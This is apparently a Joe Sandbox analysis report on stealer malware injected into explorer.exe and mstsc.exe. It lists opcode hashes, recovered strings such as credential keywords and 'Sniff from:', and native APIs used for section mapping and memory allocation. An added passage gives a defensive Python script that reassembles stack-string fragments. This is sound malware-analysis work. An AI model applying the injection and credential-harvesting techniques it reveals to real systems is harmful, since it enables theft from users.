                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$el32$h$kern
                                                                                                                                                                                    • API String ID: 0-4264704552
                                                                                                                                                                                    • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                    • Instruction ID: 5862f81190bf5a96001e16133a08b49eb1e6ab1195b1b47d7cd7ec2f9c9489ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75416F70608B888FD769DF6C84843BAB7E1FF98301F144A7E959AC22A6DB70C545CB51
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                                                                                    • API String ID: 0-3434893486
                                                                                                                                                                                    • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                    • Instruction ID: f6422f449d241ca1550db471b57d27e467fe4b6117772e5f44792d7edf8d62dd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3231C57551CB885FD71ADB28C4886DAB7D4FB94300F50492EE49BC7392EE30A54ACB42
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: $Snif$f fr$om:
                                                                                                                                                                                    • API String ID: 0-3434893486
                                                                                                                                                                                    • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                    • Instruction ID: c9a9c1e3c3233ee2d93060ec9009bcb745810055cdc083dec4ccc0cfdb2b99e7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6131C47551CB486FD71ADB28C4886EAB7D5FB94301F50492EE49BC7392EE30A506CE42
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                    • API String ID: 0-3136806129
                                                                                                                                                                                    • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                    • Instruction ID: 09d962a3e3a30fcd149ba04eeb2ad98211c52b855b4d8bbbe99924c2858d65cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C316B74118B588FCB84EF689498BAAB7E1FF98202F84063D994ECB356DF30D545CB52
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                    • API String ID: 0-3136806129
                                                                                                                                                                                    • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                    • Instruction ID: 1eded8bd03314baca6c4b21d4d1ee1cf873d67bb4b87fa5ebd8e7d33dfe214dd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58316B74118B588FCB84EF689498AAAB7E1FF98201F84063D994ACB356DF30C545CB52
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                    • API String ID: 0-319646191
                                                                                                                                                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                    • Instruction ID: 7f55afeba025f6a17e6fddae2b6cabe23c95209a4f0a428add0574778c9ba88f
                                                                                                                                                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9631D171614A0C8BCB05EFA8C8887EDBBE1FF58215F40022AD44ED7341DF748645CB99
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                    • API String ID: 0-319646191
                                                                                                                                                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction ID: 6df450dc8c1930ec53fb29e21dd79c8f2222923221c31d95ba3388bc28dc85ea
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1221E470610A1C8BCB05EFA8C8887EDBBE5FF58305F40422AD45AD7391DF748605CB99
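The String ID fields in the records above are the strings the sandbox recovered from the injected explorer.exe region at 08170000, sorted and joined with '$'. Most of them are 4-character pieces (shel, l32., dll; kern, el32, .dll; Snif, f fr, om:), which is what a string extractor sees when code assembles its strings on the stack from 32-bit immediates instead of storing them whole, and the sort order throws away how the pieces fit together. The Python script below is an added example, not part of the Joe Sandbox report and not FormBook's code: it takes those String ID values as constructed input and reassembles them, first against an assumed dictionary of Windows module names, then by listing every ordering for entries the dictionary misses. The dictionary, the 75% coverage threshold and the function names are the example's own choices.

```python
"""Reassemble fragmented stack strings from Joe Sandbox 'String ID' entries.

Added example (not part of the Joe Sandbox report). The report lists each
piece it saw as its own string, joined with '$' and sorted, so the original
order is lost. Two recovery strategies:
  1. cover a dictionary of expected strings with the pieces (dictionary is an
     assumption: common Windows module names);
  2. enumerate orderings for entries the dictionary does not explain.
"""
from itertools import permutations
from typing import Dict, List, Tuple

# Constructed input: copied from the 'String ID' lines of this report.
STRING_IDS = [
    "2.dl$dll$l32.$ole3$shel",
    "4$\\$dll$ion.$vers",
    "32.d$cli.$dll$sspi$user",
    ".dll$el32$h$kern",
    "$Snif$f fr$om:",
    ".dll$chro$hild$me_c",
    "User-Agent: $nt: $on.d$urlmon.dll",
]

# Assumed dictionary: module names a loader resolves by hand. Extend as needed.
DICTIONARY = [
    "kernel32.dll", "user32.dll", "ole32.dll", "shell32.dll",
    "version.dll", "sspicli.dll", "urlmon.dll", "chrome_child.dll",
]


def split_pieces(string_id: str) -> List[str]:
    """'$' separates pieces; a leading '$' yields an empty entry, so drop blanks."""
    return [p for p in string_id.split("$") if p]


def cover(target: str, pieces: List[str]) -> Tuple[int, List[str]]:
    """Best prefix coverage of `target` by an ordered, non-repeating piece sequence.

    Returns (characters of `target` covered from its start, pieces used in order).
    Partial coverage is kept on purpose: the report lists each distinct piece once,
    so the trailing 'll' of one name is often absent when 'dll' is already there.
    """
    best: Tuple[int, List[str]] = (0, [])

    def dfs(pos: int, used: List[int], order: List[str]) -> None:
        nonlocal best
        if pos > best[0]:
            best = (pos, list(order))
        if pos == len(target):
            return
        for i, piece in enumerate(pieces):
            if i in used or not target.startswith(piece, pos):
                continue
            dfs(pos + len(piece), used + [i], order + [piece])

    dfs(0, [], [])
    return best


def match_dictionary(string_id: str, threshold: float = 0.75) -> Dict[str, Tuple[str, bool]]:
    """Map each dictionary string reached to (reconstructed text, complete?)."""
    pieces = split_pieces(string_id)
    hits: Dict[str, Tuple[str, bool]] = {}
    for target in DICTIONARY:
        covered, order = cover(target, pieces)
        if covered / len(target) >= threshold:
            hits[target] = ("".join(order), covered == len(target))
    return hits


def candidate_orderings(string_id: str, max_pieces: int = 6) -> List[str]:
    """Every concatenation order for a small entry, for an analyst to eyeball."""
    pieces = split_pieces(string_id)
    if len(pieces) > max_pieces:
        return []
    return sorted({"".join(p) for p in permutations(pieces)})


def reconstruct(string_ids: List[str]) -> Dict[str, Dict[str, Tuple[str, bool]]]:
    """Dictionary hits for every String ID entry, keyed by the raw entry."""
    return {sid: match_dictionary(sid) for sid in string_ids}


if __name__ == "__main__":
    for sid, hits in reconstruct(STRING_IDS).items():
        if not hits:
            print(f"{sid!r:40} -> no dictionary hit; orderings: {candidate_orderings(sid)}")
            continue
        for target, (text, complete) in hits.items():
            note = "" if complete else "  (partial: a piece is missing from the listing)"
            print(f"{sid!r:40} -> {text!r:20} {target}{note}")
```

Run as a script it prints shell32.dll, version.dll, sspicli.dll, kernel32.dll, chrome_child.dll and urlmon.dll as complete reconstructions, ole32.dl and user32.d as partial ones (the shared trailing piece appears only once, as 'dll'), and for the entry with no module name it lists the six orderings, one of which reads Sniff from:. The whole-string entries (User-Agent: , urlmon.dll) are matched as single pieces, so the same pass handles listings that mix fragments and complete strings.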
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .$l$l$t
                                                                                                                                                                                    • API String ID: 0-168566397
                                                                                                                                                                                    • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                    • Instruction ID: 481d08bee0599525db82fcd6d195f087c2913d5e4973ee9d905f4b7d297524f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                    • Instruction Fuzzy Hash: A8218B74A24A0D9BDB08EFA8D048BEEBBF1FF18305F50462ED009D3741DB7495518B84
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .$l$l$t
                                                                                                                                                                                    • API String ID: 0-168566397
                                                                                                                                                                                    • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                    • Instruction ID: f0a71c80737f853db9b2f0a98a70c4566ce600b03d51a5ea6bd93c1ad4de78ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4217A74A24A0D9BDB08EFA8D048BAEBAF1FF18305F50462ED009D3741DB7495918B84
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: auth$logi$pass$user
                                                                                                                                                                                    • API String ID: 0-2393853802
                                                                                                                                                                                    • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                    • Instruction ID: ffe0a3ea1529da3cc3d50c741c2c59fec1313157538f33ca119be6031143f1e6
                                                                                                                                                                                    • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A21AC70724B0D8BCB05DF9D98806AEB7E1EF88344F004A1AA40AEB356D7B0D9158BC2

Execution Graph

Execution Coverage: 1.5%
Dynamic/Decrypted Code Coverage: 9%
Signature Coverage: 0%
Total number of Nodes: 398
Total number of Limit Nodes: 56

Control-flow Graph

APIs
• NtQueryInformationProcess.NTDLL ref: 0204A19F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction ID: e880982bb4e0d1262c6be74b72f90859b8195051fa30bacdecf19363ee2df9e3
• Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction Fuzzy Hash: EEF11270A18A8C8FDBA9EF68C894AEEB7E1FF98304F40462AD44ED7250DF349545DB41

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
Similarity
• API ID: Section$CloseCreateView
• String ID: @$@
• API String ID: 1133238012-149943524
• Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction ID: 81db94dbf18e7da32b16be6ac007113409f81ca75482582d1b27177d1a53b693
• Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction Fuzzy Hash: 55617170518B4C8FCB58EF58D8856AABBE0FB98314F50462EE58AC3651DF35D441CB86

Control-flow Graph: basic blocks 2049bb2-2049ddc; internal calls 2049102, 204b942, 2049172, 204cd62; APIs NtCreateSection, NtMapViewOfSection, NtClose
Memory Dump Source
• Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
Similarity
• API ID: Section$CreateView
• String ID: @$@
• API String ID: 1585966358-149943524
• Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction ID: 2c1e80ea03cda8a728c236f522e311cd303939e1b33d311c323313b54eaa9dd8
• Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction Fuzzy Hash: E3517EB0618B088FCB58DF58D8956AABBE0FB88314F50462EE98AC3651DF35D541CB86

APIs
• NtQueryInformationProcess.NTDLL ref: 0204A19F
Memory Dump Source
• Source File: 0000000A.00000002.928628253.0000000002040000.00000040.00000800.00020000.00000000.sdmp, Offset: 02040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2040000_mstsc.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction ID: 32b14849d006e4c294f941cc625b1fc6beccd04ce1b5d530e774b62cd0a604ce
• Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction Fuzzy Hash: BF514EB0918A8C8FDBA9EF68C8946EEB7F5FB98304F40462ED44AD7250DF309645DB41

Control-flow Graph: basic block 9a330-9a381; internal call 9af30; API NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,00094BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A37D
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: 9485ad54f96afe5341ad736c9d384f84903a0002a59b5b52263d74decdbc4af1
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: 68F0B2B2211208ABCB08CF88DC95EEB77ADAF8C754F158248BA0D97241C630E8118BA4

Control-flow Graph: basic blocks 9a3e0-9a429; internal call 9af30; API NtReadFile
APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A425
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Similarity
• API ID: FileRead
• String ID: 1J
• API String ID: 2738559852-2845985182
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: ed44a675b617bd3db82fc8b14b58137a535d62411a471b13865e22f32db39a27
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: 31F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158259BE1D97241DA30E811CBA0

Control-flow Graph: basic block 9a3dc-9a429; internal call 9af30; API NtReadFile
APIs
• NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1J,FFFFFFFF,?,rM,?,00000000), ref: 0009A425
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Similarity
• API ID: FileRead
• String ID: 1J
• API String ID: 2738559852-2845985182
• Opcode ID: 32f93a41399eba2e5e869b44a503e5fb648a2b791349a3ff4947db602cf1b5fd
• Instruction ID: 08a580170d0fc60a34a26b34ae166f2594ebd40694aff7a5f6e5159cf6d1a98c
• Opcode Fuzzy Hash: 32f93a41399eba2e5e869b44a503e5fb648a2b791349a3ff4947db602cf1b5fd
• Instruction Fuzzy Hash: 15F01DB6210045AFCB04DF98D890CEB7BA9AF8D314B05829DF95C97201C530E855CBA0

APIs
• NtClose.NTDLL(PM,?,?,00094D50,00000000,FFFFFFFF), ref: 0009A485
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Similarity
• API ID: Close
• String ID: PM
• API String ID: 3535843008-2952166990
• Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction ID: ed9d2910e13bd0b8bc4f380d45e1098f0e9f4163baf3e5d73bda02a158b23ee7
• Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction Fuzzy Hash: 9ED012762102146BDB10EBD8CC45ED7775CEF44750F154455BA185B242C530F50086E0

APIs
• NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A549
Memory Dump Source
• Source File: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_80000_mstsc.jbxd
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction ID: b0f267d14870df2895e22410e5c1ac42993de72ff2289dbaf79f75324fbca76b
• Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: BCF015B2210208ABCB14DF89CC81EEB77ADAF88754F118159BE0897241C630F811CBE0

Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
• Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
• Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
• Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
